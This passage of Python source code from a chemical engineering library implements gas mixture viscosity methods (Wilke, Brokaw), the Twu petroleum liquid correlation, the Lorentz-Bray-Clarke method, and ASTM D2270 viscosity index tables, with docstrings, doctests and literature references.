        Molecular weights of all components, [g/mol]
Returns
-------
mug : float
Viscosity of gas mixture, [Pa*s]
Notes
-----
This equation is entirely dimensionless; all dimensions cancel.
The original source has not been reviewed or found.
See Also
--------
Wilke_prefactors
Wilke_prefactored
Wilke_large
Examples
--------
>>> Wilke([0.05, 0.95], [1.34E-5, 9.5029E-6], [64.06, 46.07])
9.701614885866193e-06
References
----------
.. [1] Wilke, C. R. "A Viscosity Equation for Gas Mixtures." The Journal of
Chemical Physics 18, no. 4 (April 1, 1950): 517-19.
https://doi.org/10.1063/1.1747673.
'''
cmps = range(len(ys))
phis = [[(1.0 + (mus[i]/mus[j])**0.5*(MWs[j]/MWs[i])**0.25)**2.0/(8.0*(1.0 + MWs[i]/MWs[j]))**0.5
for j in cmps] for i in cmps]
    # Some publications exclude the i == j term from the denominator sum and add
    # the bare mole fraction instead; that form is equivalent because phi[i][i] == 1
return sum([ys[i]*mus[i]/sum([ys[j]*phis[i][j] for j in cmps]) for i in cmps])
def Wilke_prefactors(MWs):
r'''The :obj:`Wilke` gas viscosity method can be sped up by precomputing several
    matrices. The memory used is proportional to N^2, so it can be significant,
    but using the precomputed matrices still gives a substantial performance
    increase even when they are too large to fit in cache. These matrices are functions of
molecular weights only. These are used by the :obj:`Wilke_prefactored` function.
.. math::
t0_{i,j} = \frac{ \sqrt{\frac{MW_{j}}{MW_{i}}}}{
\sqrt{\frac{8 MW_{i}}{MW_{j}} + 8}}
.. math::
t1_{i,j} = \frac{2 \sqrt[4]{\frac{MW_{j}}{MW_{i}}}
}{\sqrt{\frac{8 MW_{i}}{MW_{j}} + 8}}
.. math::
t2_{i,j} = \frac{1}{\sqrt{\frac{8 MW_{i}}{MW_{j}} + 8}}
Parameters
----------
MWs : list[float]
Molecular weights of all components, [g/mol]
Returns
-------
t0s : list[list[float]]
First terms, [-]
t1s : list[list[float]]
Second terms, [-]
t2s : list[list[float]]
Third terms, [-]
Notes
-----
These terms are derived as follows using SymPy. The viscosity terms are not
    known beforehand so they are not included in the factors, but otherwise
these parameters simplify the computation of the :math:`\phi_{ij}` term
to the following:
.. math::
\phi_{ij} = \frac{\mu_i}{\mu_j}t0_{i,j} + \sqrt{\frac{\mu_i}{\mu_j}}t1_{i,j} + t2_{i,j}
>>> from sympy import * # doctest: +SKIP
>>> MWi, MWj, mui, muj = symbols('MW_i, MW_j, mu_i, mu_j') # doctest: +SKIP
>>> f = (1 + sqrt(mui/muj)*(MWj/MWi)**Rational(1,4))**2 # doctest: +SKIP
>>> denom = sqrt(8*(1+MWi/MWj)) # doctest: +SKIP
>>> (expand(simplify(expand(f))/denom)) # doctest: +SKIP
mu_i*sqrt(MW_j/MW_i)/(mu_j*sqrt(8*MW_i/MW_j + 8)) + 2*(MW_j/MW_i)**(1/4)*sqrt(mu_i/mu_j)/sqrt(8*MW_i/MW_j + 8) + 1/sqrt(8*MW_i/MW_j + 8) # doctest: +SKIP
Examples
--------
>>> Wilke_prefactors([64.06, 46.07])
([[0.25, 0.19392193320396522], [0.3179655106303118, 0.25]], [[0.5, 0.421161930934918], [0.5856226024677849, 0.5]], [[0.25, 0.22867110638055677], [0.2696470380083788, 0.25]])
>>> Wilke_prefactored([0.05, 0.95], [1.34E-5, 9.5029E-6], *Wilke_prefactors([64.06, 46.07]))
9.701614885866193e-06
'''
cmps = range(len(MWs))
MWs_inv = [1.0/MWi for MWi in MWs]
phi_fact_invs = [[1.0/(8.0*(1.0 + MWs[i]*MWs_inv[j]))**0.5
for j in cmps] for i in cmps]
t0s = [[(MWs[j]*MWs_inv[i])**0.5*phi_fact_invs[i][j]
for j in cmps] for i in cmps]
t1s = [[2.0*(MWs[j]*MWs_inv[i])**0.25*phi_fact_invs[i][j]
for j in cmps] for i in cmps]
return t0s, t1s, phi_fact_invs
def Wilke_prefactored(ys, mus, t0s, t1s, t2s):
r'''Calculates viscosity of a gas mixture according to
mixing rules in [1]_, using precomputed parameters.
.. math::
\eta_{mix} = \sum_{i=1}^n \frac{y_i \eta_i}{\sum_{j=1}^n y_j \phi_{ij}}
.. math::
\phi_{ij} = \frac{\mu_i}{\mu_j}t0_{i,j} + \sqrt{\frac{\mu_i}{\mu_j}}
t1_{i,j} + t2_{i,j}
Parameters
----------
    ys : list[float]
        Mole fractions of gas components, [-]
    mus : list[float]
        Gas viscosities of all components, [Pa*s]
t0s : list[list[float]]
First terms, [-]
t1s : list[list[float]]
Second terms, [-]
t2s : list[list[float]]
Third terms, [-]
Returns
-------
mug : float
Viscosity of gas mixture, [Pa*s]
Notes
-----
This equation is entirely dimensionless; all dimensions cancel.
See Also
--------
Wilke_prefactors
Wilke
Wilke_large
Examples
--------
>>> Wilke_prefactored([0.05, 0.95], [1.34E-5, 9.5029E-6], *Wilke_prefactors([64.06, 46.07]))
9.701614885866193e-06
References
----------
.. [1] Wilke, C. R. "A Viscosity Equation for Gas Mixtures." The Journal of
Chemical Physics 18, no. 4 (April 1, 1950): 517-19.
https://doi.org/10.1063/1.1747673.
'''
N = len(ys)
mu_root_invs = [0.0]*N
mu_roots = [0.0]*N
mus_inv = [0.0]*N
for i in range(N):
# 1/sqrt(mus)
mu_root_invs[i] = muirtinv = 1.0/sqrt(mus[i])
# sqrt(mus)
mu_roots[i] = muirtinv*mus[i]
# 1/mus
mus_inv[i] = muirtinv*muirtinv
mu = 0.0
    for i in range(N): # numba's prange does not help here
tot = 0.0
for j in range(N):
phiij = mus[i]*mus_inv[j]*t0s[i][j] + mu_roots[i]*mu_root_invs[j]*t1s[i][j] + t2s[i][j]
tot += ys[j]*phiij
mu += ys[i]*mus[i]/tot
return mu
""" # Alternate variant which may be able to be faster in parallel
N = len(ys)
mu_root_invs = [0.0]*N
mu_roots = [0.0]*N
mus_inv = [0.0]*N
tots = [0.0]*N
for i in range(N):
# 1/sqrt(mus)
mu_root_invs[i] = muirtinv = 1.0/sqrt(mus[i])
# sqrt(mus)
mu_roots[i] = muirtinv*mus[i]
# 1/mus
mus_inv[i] = muirtinv*muirtinv*ys[i]
mu_root_invs[i] *= ys[i]
mu = 0.0
for i in range(N):
tot = 0.0
# Not a symmetric matrix unfortunately
for j in range(N):
tot += ys[j]*t2s[i][j]
tots[i] += tot
for i in range(N):
tot1 = 0.0
for j in range(N):
tot1 += mus_inv[j]*t0s[i][j]
tots[i] += tot1*mus[i]
for i in range(N):
tot2 = 0.0
for j in range(N):
tot2 += mu_root_invs[j]*t1s[i][j]
tots[i] += tot2*mu_roots[i]
for i in range(N):
mu += ys[i]*mus[i]/tots[i]
return mu
"""
def Wilke_large(ys, mus, MWs):
r'''Calculates viscosity of a gas mixture according to
mixing rules in [1]_.
This function is a slightly faster version of :obj:`Wilke`. It achieves its
extra speed by avoiding some checks, some powers, and by allocating less
memory during the computation. For very large component vectors, this
function should be called instead.
Parameters
----------
    ys : list[float]
        Mole fractions of gas components, [-]
    mus : list[float]
        Gas viscosities of all components, [Pa*s]
    MWs : list[float]
        Molecular weights of all components, [g/mol]
Returns
-------
mug : float
Viscosity of gas mixture, [Pa*s]
See Also
--------
Wilke_prefactors
Wilke_prefactored
Wilke
Examples
--------
>>> Wilke_large([0.05, 0.95], [1.34E-5, 9.5029E-6], [64.06, 46.07])
9.701614885866193e-06
References
----------
.. [1] Wilke, C. R. "A Viscosity Equation for Gas Mixtures." The Journal of
Chemical Physics 18, no. 4 (April 1, 1950): 517-19.
https://doi.org/10.1063/1.1747673.
'''
    # For cases where memory is scarce or extra allocation is not desired
N = len(MWs)
# Compute the MW and assorted power vectors
MW_invs = [0.0]*N
MW_inv_mus = [0.0]*N
mu_roots = [0.0]*N
mus_inv_MW_roots = [0.0]*N
mu_root_invs_MW_25s = [0.0]*N
for i in range(N):
MW_root = sqrt(MWs[i])
MW_root_inv = 1.0/MW_root
MW_25_inv = sqrt(MW_root_inv)
mu_root_inv = 1.0/sqrt(mus[i])
x0 = mu_root_inv*MW_root
# Stored values
mu_roots[i] = 2.0*mu_root_inv*mus[i]*MW_25_inv
MW_invs[i] = 8.0*MW_root_inv*MW_root_inv
MW_inv_mus[i] = mus[i]*MW_root_inv
mus_inv_MW_roots[i] = mu_root_inv*x0
mu_root_invs_MW_25s[i] = x0*MW_25_inv
mu = 0.0
for i in range(N):
        # numba's prange does help here, but only when N is large; for small N it hinders
tot = 0.0
MWi = MWs[i]
MWs_root_invi = MW_inv_mus[i]
MW_25_invi = mu_roots[i]
# Not a symmetric matrix unfortunately
for j in range(N):
# sqrt call is important for PyPy to make this fast
# Numba sees as 25% performance increase by making this an pow(x, -0.5)
phii_denom = ys[j]/sqrt(8.0 + MWi*MW_invs[j])
tot += phii_denom + phii_denom*(mus_inv_MW_roots[j]*MWs_root_invi
+ mu_root_invs_MW_25s[j]*MW_25_invi)
mu += ys[i]*mus[i]/tot
return mu
def Brokaw(T, ys, mus, MWs, molecular_diameters, Stockmayers):
r'''Calculates viscosity of a gas mixture according to
mixing rules in [1]_.
.. math::
\eta_{mix} = \sum_{i=1}^n \frac{y_i \eta_i}{\sum_{j=1}^n y_j \phi_{ij}}
.. math::
\phi_{ij} = \left( \frac{\eta_i}{\eta_j} \right)^{0.5} S_{ij} A_{ij}
.. math::
A_{ij} = m_{ij} M_{ij}^{-0.5} \left[1 +
\frac{M_{ij} - M_{ij}^{0.45}}
{2(1+M_{ij}) + \frac{(1 + M_{ij}^{0.45}) m_{ij}^{-0.5}}{1 + m_{ij}}} \right]
.. math::
m_{ij} = \left[ \frac{4}{(1+M_{ij}^{-1})(1+M_{ij})}\right]^{0.25}
.. math::
M_{ij} = \frac{M_i}{M_j}
.. math::
S_{ij} = \frac{1 + (T_i^* T_j^*)^{0.5} + (\delta_i \delta_j/4)}
{[1+T_i^* + (\delta_i^2/4)]^{0.5}[1+T_j^*+(\delta_j^2/4)]^{0.5}}
.. math::
T^* = kT/\epsilon
Parameters
----------
T : float
Temperature of fluid, [K]
    ys : list[float]
        Mole fractions of gas components, [-]
    mus : list[float]
        Gas viscosities of all components, [Pa*s]
    MWs : list[float]
        Molecular weights of all components, [g/mol]
    molecular_diameters : list[float]
        L-J molecular diameters of all components, [angstroms]
    Stockmayers : list[float]
        L-J Stockmayer energy parameters (epsilon/k) of all components, [K]
Returns
-------
mug : float
Viscosity of gas mixture, [Pa*s]
Notes
-----
This equation is entirely dimensionless; all dimensions cancel.
The original source has not been reviewed.
This is DIPPR Procedure 8D: Method for the Viscosity of Nonhydrocarbon
Vapor Mixtures at Low Pressure (Polar and Nonpolar)
Examples
--------
>>> Brokaw(308.2, [0.05, 0.95], [1.34E-5, 9.5029E-6], [64.06, 46.07], [0.42, 0.19], [347, 432])
9.699085099801568e-06
References
----------
.. [1] Brokaw, R. S. "Predicting Transport Properties of Dilute Gases."
Industrial & Engineering Chemistry Process Design and Development
8, no. 2 (April 1, 1969): 240-53. doi:10.1021/i260030a015.
.. [2] Brokaw, R. S. Viscosity of Gas Mixtures, NASA-TN-D-4496, 1968.
.. [3] Danner, Ronald P, and Design Institute for Physical Property Data.
Manual for Predicting Chemical Process Design Data. New York, N.Y, 1982.
'''
N = len(ys)
cmps = range(len(ys))
MDs = molecular_diameters
Tsts = [T/Stockmayer_i for Stockmayer_i in Stockmayers]
Tstrs = [i**0.5 for i in Tsts]
Aij = [[0.0]*N for j in cmps]
phiij =[[0.0]*N for j in cmps]
for i in cmps:
for j in cmps:
Sij = (1.0 +Tstrs[i]*Tstrs[j] + (MDs[i]*MDs[j])/4.)/(
1.0 + Tsts[i] + (0.25*MDs[i]*MDs[i]))**0.5/(1.0 + Tsts[j]
+ (0.25*MDs[j]*MDs[j]))**0.5
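            # If both components are essentially nonpolar (negligible delta),
            # the polar correction S_ij reduces to 1.0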
if MDs[i] <= 0.1 and MDs[j] <= 0.1:
Sij = 1.0
Mij = MWs[i]/MWs[j]
Mij45 = Mij**0.45
mij = (4./((1.0 + 1.0/Mij)*(1.0 + Mij)))**0.25
Aij[i][j] = mij*Mij**-0.5*(1.0 + (Mij - Mij45)/(2.0*(1.0 + Mij)
+ (1.0 + Mij45)*mij**-0.5/(1.0 + mij)))
phiij[i][j] = (mus[i]/mus[j])**0.5*Sij*Aij[i][j]
return sum([ys[i]*mus[i]/sum([ys[j]*phiij[i][j] for j in cmps]) for i in cmps])
### Petroleum liquids
def Twu_1985_internal(T, Tb, SG):
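    # Works in the units of the original correlation: temperatures in degrees
    # Rankine and kinematic viscosity in cSt; the Twu_1985 wrapper handles the
    # conversion from and to SI units.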
Tb2 = Tb*Tb
Tb10 = Tb2*Tb2
Tb10 *= Tb10*Tb2 # compute Tb^-10
Tb_inv = 1.0/Tb
Tb_sqrt_inv = 1.0/sqrt(Tb)
# equation 15
Tc0 = Tb/(0.533272 + 0.191017e-3*Tb + 0.779681e-7*Tb2 - 0.284376e-10*Tb2*Tb
+ 0.959468e28/(Tb10*Tb2*Tb))
alpha = 1.0 - Tb/Tc0
alpha3 = alpha*alpha*alpha
SG0 = 0.843593 -0.128624*alpha - 3.36159*alpha3
alpha6 = alpha3*alpha3
SG0 -= 13749.5*alpha6*alpha6
dSG = SG - SG0
nu20 = (exp(4.73227 - 27.0975*alpha + alpha*(49.4491*alpha
- 50.4706*alpha3)) - 1.5)
nu10 = exp(0.801621 + 1.37179*log(nu20))
x = abs(1.99873 - 56.7394*Tb_sqrt_inv)
f1 = 1.33932*x*dSG - 21.1141*dSG*dSG*Tb_sqrt_inv
f2 = x*dSG - 21.1141*dSG*dSG*Tb_sqrt_inv
square_term2 = (1.0 + f2 + f2)/(1.0 - f2 - f2)
square_term2 *= square_term2
square_term1 = (1.0 + f1 + f1)/(1.0 - f1 - f1)
square_term1 *= square_term1
x0 = 450.0*Tb_inv
nu1 = exp(log(nu10 + x0)*square_term1) - x0
nu2 = exp(log(nu20 + x0)*square_term2) - x0
# T1 = 559.67 # 100 deg F
# T2 = 669.67 # 210 deg F
logT1 = 6.3273473243178415 # log(559.67)
# logT2 = 6.506785053735233 # log(669.67)
Z1 = nu1 + 0.7 + exp(-1.47 - nu1*(1.84 + 0.51*nu1))
Z2 = nu2 + 0.7 + exp(-1.47 - nu2*(1.84 + 0.51*nu2))
loglogZ1 = log(log(Z1))
try:
B = (loglogZ1 - log(log(Z2)))*-5.572963964974682 #/(logT1 - logT2)
except:
B = 0.0
try:
Z = exp(exp(loglogZ1 + B*(log(T) - logT1)))
except:
Z = 1.0
# cSt
x0 = Z - 0.7
nu = x0 - exp(-0.7487 + x0*(x0*(0.6119 - 0.3193*x0) - 3.295))
return nu
def Twu_1985(T, Tb, rho):
r'''Calculate the viscosity of a petroleum liquid using the
Twu (1985) correlation
    developed in [1]_. Based on a fit which uses n-alkanes as a
    reference. Requires the boiling point and density of
    the system.
Parameters
----------
T : float
Temperature of fluid [K]
Tb : float
Normal boiling point, [K]
rho : float
        Liquid density as measured at 60 deg F, [kg/m^3]
Returns
-------
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
The formulas are as follows:
.. math::
T_{c}^{\circ}=T_{b}\left(0.533272+0.191017 \times 10^{-3} T_{b}
+0.779681 \times 10^{-7} T_{b}^{2}
-0.284376 \times 10^{-10} T_{b}^{3}+0.959468
\times 10^{28}/T_{b}^{13}\right)^{-1}
.. math::
\alpha=1-T_{b} / T_{c}^{\circ}
.. math::
\ln \left(\nu_2^{\circ}+1.5\right)=4.73227-27.0975 \alpha
+49.4491 \alpha^{2}-50.4706 \alpha^{4}
.. math::
\ln \left(\nu_1^{\circ}\right)=0.801621+1.37179 \ln \left(\nu_2^{\circ}\right)
.. math::
{SG}^{\circ}=0.843593-0.128624 \alpha-3.36159 \alpha^{3}-13749.5 \alpha^{12}
.. math::
\Delta {SG} = {SG} - {SG}^\circ
.. math::
|x|=\left|1.99873-56.7394 / \sqrt{T_{b}}\right|
.. math::
f_{1}=1.33932|x| \Delta {SG} - 21.1141 \Delta {SG}^{2} / \sqrt{T_{b}}
.. math::
f_{2}=|x| \Delta {SG}-21.1141 \Delta {SG}^{2} / \sqrt{T_{b}}
.. math::
\ln \left(\nu_{1}+\frac{450}{T_{b}}\right)=\ln \left(\nu_{1}^{\circ}
+\frac{450}{T_{b}}\right)\left(\frac{1+2 f_{1}}{1-2 f_{1}}\right)^{2}
.. math::
\ln \left(\nu_{2}+\frac{450}{T_{b}}\right)=\ln \left(\nu_{2}^{\circ}
+\frac{450}{T_{b}}\right)\left(\frac{1+2 f_{2}}{1-2 f_{2}}\right)^{2}
.. math::
Z = \nu+0.7+\exp \left(-1.47-1.84 \nu-0.51 \nu^{2}\right)
.. math::
B=\frac{\ln \ln Z_{1}-\ln \ln Z_{2}}{\ln T_1-\ln T_2}
.. math::
\ln \ln Z=\ln \ln Z_{1}+B(\ln T-\ln T_1)
.. math::
        \nu=(Z-0.7)-\exp \left(-0.7487-3.295(Z-0.7)+0.6119(Z-0.7)^{2}
        -0.3193(Z-0.7)^{3}\right)
Examples
--------
Sample point from article:
>>> Twu_1985(T=338.7055, Tb=672.3166, rho=895.5189)
0.008235009644854494
References
----------
.. [1] Twu, Chorng H. "Internally Consistent Correlation for Predicting
Liquid Viscosities of Petroleum Fractions." Industrial & Engineering
Chemistry Process Design and Development 24, no. 4 (October 1, 1985):
1287-93. https://doi.org/10.1021/i200031a064.
'''
SG = rho*0.00100098388466972 #1/999.0170824078306
nu = Twu_1985_internal(T*1.8, Tb*1.8, SG)
nu = nu*1e-6 # to m^2/s
rho = SG*999.0170824078306 # calculate density from SG
mu = nu*rho
return mu
### Viscosity for Liquids or Gases
def Lorentz_Bray_Clarke(T, P, Vm, zs, MWs, Tcs, Pcs, Vcs):
r'''Calculates the viscosity of a gas or a liquid using the method of
Lorentz, Bray, and Clarke [1]_. This method is not quite the same as the
original, but rather the form commonly presented and used today. The
original had a different formula for pressure correction for gases which
was tabular and not presented entirely in [1]_. However using that
distinction introduces a discontinuity between the liquid and gas viscosity,
so it is not normally used.
.. math::
        \mu [\text{centipoise}] = \mu_{\text{P low, Stiel-Thodos}} [\text{centipoise}]
+ \frac{\text{poly}^4 - 0.0001}{\xi}
.. math::
\text{poly} = (0.1023 + 0.023364 \rho_r + 0.058533\rho_r^2
- 0.040758\rho_r^3 + 0.0093724\rho_r^4)
.. math::
\xi = T_c^{1/6} MW^{-1/2} (P_c\text{[atm]})^{-2/3}
Parameters
----------
T : float
Temperature of the fluid [K]
P : float
Pressure of the fluid [Pa]
Vm : float
Molar volume of the fluid at the actual conditions, [m^3/mol]
zs : list[float]
Mole fractions of chemicals in the fluid, [-]
MWs : list[float]
        Molecular weights of chemicals in the fluid [g/mol]
    Tcs : list[float]
        Critical temperatures of chemicals in the fluid [K]
    Pcs : list[float]
        Critical pressures of chemicals in the fluid [Pa]
    Vcs : list[float]
Critical molar volumes of chemicals in the fluid; these are often used
as tuning parameters, fit to match a pure component experimental
viscosity value [m^3/mol]
Returns
-------
mu : float
        Viscosity of phase at actual conditions, [Pa*s]
Notes
-----
An example from [2]_ was implemented and checked for validation. Somewhat
different rounding is used in [2]_.
The mixing of the pure component Stiel-Thodos viscosities happens with the
Herning-Zipperer mixing rule:
.. math::
\mu = \frac{\sum x_i \mu_i \sqrt{MW_i}}{\sum x_i \sqrt{MW_i}}
Examples
--------
>>> Lorentz_Bray_Clarke(T=300.0, P=1e6, Vm=0.0023025, zs=[.4, .3, .3],
... MWs=[16.04246, 30.06904, 44.09562], Tcs=[190.564, 305.32, 369.83],
... Pcs=[4599000.0, 4872000.0, 4248000.0], Vcs=[9.86e-05, 0.0001455, 0.0002])
9.925488160761484e-06
References
----------
.. [1] Lohrenz, John, Bruce G. Bray, and Charles R. Clark. "Calculating
Viscosities of Reservoir Fluids From Their Compositions." Journal of
Petroleum Technology 16, no. 10 (October 1, 1964): 1,171-1,176.
https://doi.org/10.2118/915-PA.
.. [2] Whitson, Curtis H., and Michael R. Brulé. Phase Behavior. Henry L.
Doherty Memorial Fund of AIME, Society of Petroleum Engineers, 2000.
'''
Tc, Pc, Vc, MW = 0.0, 0.0, 0.0, 0.0
N = len(zs)
for i in range(N):
Tc += Tcs[i]*zs[i]
Pc += Pcs[i]*zs[i]
Vc += Vcs[i]*zs[i]
MW += MWs[i]*zs[i]
Pc = Pc/101325. # The `xi` parameter is defined using P in atmospheres
xi = Tc**(1.0/6.0)*MW**-0.5*Pc**(-2.0/3.0)
rhoc = 1.0/Vc # Molar pseudocritical density
rhom = 1.0/Vm
rhor = rhom/rhoc
# mu star is computed here
mus_low_gas = [0.0]*N
for i in range(N):
mus_low_gas[i] = Stiel_Thodos(T, Tcs[i], Pcs[i], MWs[i])
mu_low_gas = Herning_Zipperer(zs, mus_low_gas, MWs)
# Polynomial - in horner form, validated
poly = rhor*(rhor*(rhor*(0.0093724*rhor - 0.040758) + 0.058533) + 0.023364) + 0.1023
mu_low_gas *= 1e3 # Convert low-pressure viscosity to cP
poly2 = poly*poly
mu = (mu_low_gas*xi + poly2*poly2 - 0.0001)/xi
    return mu*1e-3 # Convert back from cP to Pa*s
### Misc functions
def _round_whole_even(i):
r'''Round a number to the nearest whole number. If the number is exactly
between two numbers, round to the even whole number. Used by
`viscosity_index`.
Parameters
----------
i : float
Number, [-]
Returns
-------
i : int
Rounded number, [-]
Notes
-----
    The exactly-halfway case should almost never arise with inputs from a
    practical function, as floating-point numbers are rarely exactly halfway
    between two whole numbers.
Examples
--------
    >>> _round_whole_even(116.5)
116
'''
if i % .5 == 0.0:
if (i + 0.5) % 2 == 0.0:
i = i + 0.5
else:
i = i - 0.5
else:
i = round(i, 0)
return int(i)
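# Tabulated L and H values from ASTM D2270, used by `viscosity_index` (via
# interpolation over `VI_nus`) when the 100 deg C kinematic viscosity is
# below 70 mm^2/s.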
VI_nus = [2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.6, 2.7, 2.8, 2.9, 3.0, 3.1, 3.2, 3.3,
3.4, 3.5, 3.6, 3.7, 3.8, 3.9, 4.0, 4.1, 4.2, 4.3, 4.4, 4.5, 4.6, 4.7,
4.8, 4.9, 5.0, 5.1, 5.2, 5.3, 5.4, 5.5, 5.6, 5.7, 5.8, 5.9, 6.0, 6.1,
6.2, 6.3, 6.4, 6.5, 6.6, 6.7, 6.8, 6.9, 7.0, 7.1, 7.2, 7.3, 7.4, 7.5,
7.6, 7.7, 7.8, 7.9, 8.0, 8.1, 8.2, 8.3, 8.4, 8.5, 8.6, 8.7, 8.8, 8.9,
9.0, 9.1, 9.2, 9.3, 9.4, 9.5, 9.6, 9.7, 9.8, 9.9, 10.0, 10.1, 10.2,
10.3, 10.4, 10.5, 10.6, 10.7, 10.8, 10.9, 11.0, 11.1, 11.2, 11.3, 11.4,
11.5, 11.6, 11.7, 11.8, 11.9, 12.0, 12.1, 12.2, 12.3, 12.4, 12.5, 12.6,
12.7, 12.8, 12.9, 13.0, 13.1, 13.2, 13.3, 13.4, 13.5, 13.6, 13.7, 13.8,
13.9, 14.0, 14.1, 14.2, 14.3, 14.4, 14.5, 14.6, 14.7, 14.8, 14.9, 15.0,
15.1, 15.2, 15.3, 15.4, 15.5, 15.6, 15.7, 15.8, 15.9, 16.0, 16.1, 16.2,
16.3, 16.4, 16.5, 16.6, 16.7, 16.8, 16.9, 17.0, 17.1, 17.2, 17.3, 17.4,
17.5, 17.6, 17.7, 17.8, 17.9, 18.0, 18.1, 18.2, 18.3, 18.4, 18.5, 18.6,
18.7, 18.8, 18.9, 19.0, 19.1, 19.2, 19.3, 19.4, 19.5, 19.6, 19.7, 19.8,
19.9, 20.0, 20.2, 20.4, 20.6, 20.8, 21.0, 21.2, 21.4, 21.6, 21.8, 22.0,
22.2, 22.4, 22.6, 22.8, 23.0, 23.2, 23.4, 23.6, 23.8, 24.0, 24.2, 24.4,
24.6, 24.8, 25.0, 25.2, 25.4, 25.6, 25.8, 26.0, 26.2, 26.4, 26.6, 26.8,
27.0, 27.2, 27.4, 27.6, 27.8, 28.0, 28.2, 28.4, 28.6, 28.8, 29.0, 29.2,
29.4, 29.6, 29.8, 30.0, 30.5, 31.0, 31.5, 32.0, 32.5, 33.0, 33.5, 34.0,
34.5, 35.0, 35.5, 36.0, 36.5, 37.0, 37.5, 38.0, 38.5, 39.0, 39.5, 40.0,
40.5, 41.0, 41.5, 42.0, 42.5, 43.0, 43.5, 44.0, 44.5, 45.0, 45.5, 46.0,
46.5, 47.0, 47.5, 48.0, 48.5, 49.0, 49.5, 50.0, 50.5, 51.0, 51.5, 52.0,
52.5, 53.0, 53.5, 54.0, 54.5, 55.0, 55.5, 56.0, 56.5, 57.0, 57.5, 58.0,
58.5, 59.0, 59.5, 60.0, 60.5, 61.0, 61.5, 62.0, 62.5, 63.0, 63.5, 64.0,
64.5, 65.0, 65.5, 66.0, 66.5, 67.0, 67.5, 68.0, 68.5, 69.0, 69.5, 70.0
]
VI_Ls = [7.994, 8.64, 9.309, 10.0, 10.71, 11.45, 12.21, 13.0, 13.8, 14.63,
15.49, 16.36, 17.26, 18.18, 19.12, 20.09, 21.08, 22.09, 23.13, 24.19,
25.32, 26.5, 27.75, 29.07, 30.48, 31.96, 33.52, 35.13, 36.79, 38.5,
40.23, 41.99, 43.76, 45.53, 47.31, 49.09, 50.87, 52.64, 54.42, 56.2,
57.97, 59.74, 61.52, 63.32, 65.18, 67.12, 69.16, 71.29, 73.48, 75.72,
78.0, 80.25, 82.39, 84.53, 86.66, 88.85, 91.04, 93.2, 95.43, 97.72,
100.0, 102.3, 104.6, 106.9, 109.2, 111.5, 113.9, 116.2, 118.5, 120.9,
123.3, 125.7, 128.0, 130.4, 132.8, 135.3, 137.7, 140.1, 142.7, 145.2,
147.7, 150.3, 152.9, 155.4, 158.0, 160.6, 163.2, 165.8, 168.5, 171.2,
173.9, 176.6, 179.4, 182.1, 184.9, 187.6, 190.4, 193.3, 196.2, 199.0,
201.9, 204.8, 207.8, 210.7, 213.6, 216.6, 219.6, 222.6, 225.7, 228.8,
231.9, 235.0, 238.1, 241.2, 244.3, 247.4, 250.6, 253.8, 257.0, 260.1,
263.3, 266.6, 269.8, 273.0, 276.3, 279.6, 283.0, 286.4, 289.7, 293.0,
296.5, 300.0, 303.4, 306.9, 310.3, 313.9, 317.5, 321.1, 324.6, 328.3,
331.9, 335.5, 339.2, 342.9, 346.6, 350.3, 354.1, 358.0, 361.7, 365.6,
369.4, 373.3, 377.1, 381.0, 384.9, 388.9, 392.7, 396.7, 400.7, 404.6,
408.6, 412.6, 416.7, 420.7, 424.9, 429.0, 433.2, 437.3, 441.5, 445.7,
449.9, 454.2, 458.4, 462.7, 467.0, 471.3, 475.7, 479.7, 483.9, 488.6,
493.2, 501.5, 510.8, 519.9, 528.8, 538.4, 547.5, 556.7, 566.4, 575.6,
585.2, 595.0, 604.3, 614.2, 624.1, 633.6, 643.4, 653.8, 663.3, 673.7,
683.9, 694.5, 704.2, 714.9, 725.7, 736.5, 747.2, 758.2, 769.3, 779.7,
790.4, 801.6, 812.8, 824.1, 835.5, 847.0, 857.5, 869.0, 880.6, 892.3,
904.1, 915.8, 927.6, 938.6, 951.2, 963.4, 975.4, 987.1, 998.9, 1011.0,
1023.0, 1055.0, 1086.0, 1119.0, 1151.0, 1184.0, 1217.0, 1251.0, 1286.0,
1321.0, 1356.0, 1391.0, 1427.0, 1464.0, 1501.0, 1538.0, 1575.0, 1613.0,
1651.0, 1691.0, 1730.0, 1770.0, 1810.0, 1851.0, 1892.0, 1935.0, 1978.0,
2021.0, 2064.0, 2108.0, 2152.0, 2197.0, 2243.0, 2288.0, 2333.0, 2380.0,
2426.0, 2473.0, 2521.0, 2570.0, 2618.0, 2667.0, 2717.0, 2767.0, 2817.0,
2867.0, 2918.0, 2969.0, 3020.0, 3073.0, 3126.0, 3180.0, 3233.0, 3286.0,
3340.0, 3396.0, 3452.0, 3507.0, 3563.0, 3619.0, 3676.0, 3734.0, 3792.0,
3850.0, 3908.0, 3966.0, 4026.0, 4087.0, 4147.0, 4207.0, 4268.0, 4329.0,
4392.0, 4455.0, 4517.0, 4580.0, 4645.0, 4709.0, 4773.0, 4839.0, 4905.0
]
VI_Hs = [6.394, 6.894, 7.41, 7.944, 8.496, 9.063, 9.647, 10.25, 10.87, 11.5,
12.15, 12.82, 13.51, 14.21, 14.93, 15.66, 16.42, 17.19, 17.97, 18.77,
19.56, 20.37, 21.21, 22.05, 22.92, 23.81, 24.71, 25.63, 26.57, 27.53,
28.49, 29.46, 30.43, 31.4, 32.37, 33.34, 34.32, 35.29, 36.26, 37.23,
38.19, 39.17, 40.15, 41.13, 42.14, 43.18, 44.24, 45.33, 46.44, 47.51,
48.57, 49.61, 50.69, 51.78, 52.88, 53.98, 55.09, 56.2, 57.31, 58.45,
59.6, 60.74, 61.89, 63.05, 64.18, 65.32, 66.48, 67.64, 68.79, 69.94,
71.1, 72.27, 73.42, 74.57, 75.73, 76.91, 78.08, 79.27, 80.46, 81.67,
82.87, 84.08, 85.3, 86.51, 87.72, 88.95, 90.19, 91.4, 92.65, 93.92,
95.19, 96.45, 97.71, 98.97, 100.2, 101.5, 102.8, 104.1, 105.4, 106.7,
108.0, 109.4, 110.7, 112.0, 113.3, 114.7, 116.0, 117.4, 118.7, 120.1,
121.5, 122.9, 124.2, 125.6, 127.0, 128.4, 129.8, 131.2, 132.6, 134.0,
135.4, 136.8, 138.2, 139.6, 141.0, 142.4, 143.9, 145.3, 146.8, 148.2,
149.7, 151.2, 152.6, 154.1, 155.6, 157.0, 158.6, 160.1, 161.6, 163.1,
164.6, 166.1, 167.7, 169.2, 170.7, 172.3, 173.8, 175.4, 177.0, 178.6,
180.2, 181.7, 183.3, 184.9, 186.5, 188.1, 189.7, 191.3, 192.9, 194.6,
196.2, 197.8, 199.4, 201.0, 202.6, 204.3, 205.9, 207.6, 209.3, 211.0,
